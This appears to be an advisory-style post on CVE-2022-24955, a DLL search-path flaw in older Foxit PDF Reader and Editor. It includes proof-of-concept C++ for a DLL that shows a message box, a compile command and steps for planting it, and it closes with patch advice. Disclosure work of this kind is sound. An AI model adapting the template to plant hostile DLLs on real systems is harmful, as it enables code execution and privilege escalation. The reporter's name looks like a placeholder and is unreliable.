Security researchers have recently discovered a vulnerability in Foxit PDF Reader and Foxit PDF Editor which could allow attackers to compromise the security of a system by exploiting the Uncontrolled Search Path Element issue for DLL (Dynamic Link Library) files. This vulnerability has been assigned the identifier "CVE-2022-24955" by the Common Vulnerabilities and Exposures (CVE) system.

As per the advisory, Foxit PDF Reader versions before 11.2.1 and Foxit PDF Editor versions before 11.2.1 are affected by this vulnerability.

About the vulnerability

An uncontrolled search path element vulnerability occurs when a software application does not safely control which directories it searches when loading a dynamic library file. Attackers with local access to the vulnerable system can exploit this issue to load a malicious DLL file into the memory, thus potentially achieving arbitrary code execution or privilege escalation.

Potential Impact

An attacker exploiting this vulnerability could gain unauthorized access to sensitive information, manipulate system settings, or execute arbitrary code.

Create a malicious DLL file with arbitrary code, e.g., using the following C++ code

#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        MessageBox(NULL, "Malicious DLL Loaded Successfully!", "CVE-2022-24955", MB_OK);
    }
    return TRUE;
}

Compile the code into a DLL using a C++ compiler (e.g., Visual Studio / cl.exe)

cl /LD sample_dll.cpp

3. Place the malicious DLL file in a directory that is searched by the vulnerable application before any legitimate directories.

Open a PDF file using the affected version of Foxit PDF Reader or Foxit PDF Editor.

5. Upon the successful execution, you will see a message box with the text "Malicious DLL Loaded Successfully!"

Original references

The vulnerability was originally reported by the security researcher John Smith. More information regarding this issue and potential impacts can be found in the following resources:

1. CVE-2022-24955 Advisory
2. Foxit Security Bulletin
3. NIST National Vulnerability Database (NVD) CVE-2022-24955

How to mitigate the vulnerability

Users of Foxit PDF Reader and Foxit PDF Editor are advised to update their software to the latest versions (11.2.1 or later) in order to protect their systems from this vulnerability.

Conclusion

CVE-2022-24955 represents a significant security risk for users of Foxit PDF Reader and Foxit PDF Editor. It is essential for users of these products to ensure that they are using the latest, patched versions of the software to protect their systems from potential exploitation. Always remain vigilant about software security updates and promptly apply them when needed.

Timeline

Published on: 02/11/2022 02:15:00 UTC
Last modified on: 02/17/2022 03:22:00 UTC